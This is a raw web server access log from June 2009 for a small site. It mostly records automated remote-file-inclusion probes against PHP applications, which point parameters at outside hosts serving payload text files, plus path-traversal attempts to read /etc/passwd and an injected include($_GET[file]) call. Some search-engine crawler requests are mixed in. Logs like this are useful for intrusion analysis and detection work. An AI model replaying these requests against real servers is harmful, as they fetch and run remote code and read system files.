69.72.169.233 - - [29/Jun/2009:13:00:20 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
69.72.169.233 - - [29/Jun/2009:13:00:22 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
69.72.169.233 - - [29/Jun/2009:13:00:22 -0700] "GET /logs/access.log%20%20/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
69.72.169.233 - - [29/Jun/2009:13:00:22 -0700] "GET ////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:06:53 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:06:53 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:06:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:07:10 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:07:10 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:07:10 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
72.14.199.8 - - [29/Jun/2009:13:07:32 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:09:12 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:10:41 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:10:41 -0700] "GET /logs/access_090112.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:10:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET ////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET /logs/access.log%20%20/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:11:54 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:11:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET ////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET /logs/access.log%20%20/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [29/Jun/2009:13:11:54 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:11:55 -0700] "GET /logs/access_090112.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:13:22 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:13:36 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
208.80.195.56 - - [29/Jun/2009:13:20:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; Media Center PC 3.0; Media Center PC 2.8; .NET CLR 2.0.50727)" "www.redneckmba.com"
69.237.82.158 - - [29/Jun/2009:13:29:19 -0700] "GET /logs/access_090112.log//includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
69.237.82.158 - - [29/Jun/2009:13:29:19 -0700] "GET /logs//includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
208.80.195.125 - - [29/Jun/2009:13:33:03 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.03b)" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:50 -0700] "GET /config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:50 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:51 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:56 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:44:56 -0700] "GET /config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:14 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:16 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:37 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.222 - - [29/Jun/2009:13:58:37 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:02:10 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:02:11 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:02:11 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:06:08 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:06:09 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:06:10 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:12:12 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:12:13 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:14:12:14 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
65.55.107.179 - - [29/Jun/2009:14:14:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
84.232.4.1 - - [29/Jun/2009:14:17:00 -0700] "GET /logs/access.log%20/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:14:17:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:14:17:59 -0700] "GET / HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:26:19 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:26:19 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:26:19 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:35:19 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:35:19 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
210.220.213.203 - - [29/Jun/2009:14:35:19 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [29/Jun/2009:14:50:02 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:08:23 -0700] "GET /logs/access.log%20%20/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:08:23 -0700] "GET /index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:08:23 -0700] "GET /logs/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:09:05 -0700] "GET /logs/access.log/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:09:05 -0700] "GET /index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:09:05 -0700] "GET /logs/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:10:08 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:10:10 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:10:11 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:12:15 -0700] "GET /logs/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:12:15 -0700] "GET /index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:15:12:15 -0700] "GET /logs/access.log/index.php?redir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:16:18 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:16:18 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:16:19 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:21:12 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:21:13 -0700] "GET /logs/access_090112.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:21:13 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:12 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:13 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:14 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:16 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:18 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:19 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:21 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:22 -0700] "GET /?D=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:23:41 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:23:41 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:23:42 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
88.131.106.2 - - [29/Jun/2009:15:23:56 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:24:43 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:24:43 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:24:43 -0700] "GET /logs/access_090112.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:25:04 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:25:04 -0700] "GET /logs/access_090112.log/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:15:25:04 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:25:52 -0700] "GET /logs/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:25:52 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:25:52 -0700] "GET /logs/access_090112.log/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [29/Jun/2009:15:27:00 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
80.93.48.103 - - [29/Jun/2009:15:27:01 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
80.93.48.103 - - [29/Jun/2009:15:27:01 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:28:08 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:28:46 -0700] "GET /logs/access_090112.log%20%20/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:20 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:21 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:22 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:39 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:41 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:31:42 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:32:17 -0700] "GET /zero_vote/ask_password.php?dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:32:17 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:32:17 -0700] "GET /logs/access.log%20%20//zero_vote/ask_password.php?dir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
163.20.160.14 - - [29/Jun/2009:15:33:32 -0700] "GET /logs/access_090112.log%20%20/reflect/snippet.reflect.php?reflect_base=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:34:41 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:34:41 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:15:34:42 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portisabellighthouse.com/gmcjt/c2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:36:38 -0700] "GET /zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:15:36:38 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
